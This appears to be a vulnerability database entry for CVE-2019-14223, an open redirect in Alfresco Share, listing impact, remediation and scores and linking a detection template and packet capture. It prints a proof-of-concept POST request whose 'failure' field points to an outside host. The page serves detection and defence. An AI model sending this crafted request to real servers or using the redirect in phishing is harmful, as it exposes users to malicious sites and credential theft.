🔙 목록으로 돌아가기

CVE-2019-14223: Alfresco Share - Open Redirect

TitleAlfresco Share - Open Redirect
Authorpdteam
SeverityMedium
ImpactAn attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
RemediationApply the latest security patches or updates provided by Alfresco to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.59279
CVE IDCVE-2019-14223
CWE IDCWE-601
Tags cve cve2019 redirect alfresco vkev vuln

🔍 Vulnerability Description

Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

POST /share/page/dologin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-14223.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-14223.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A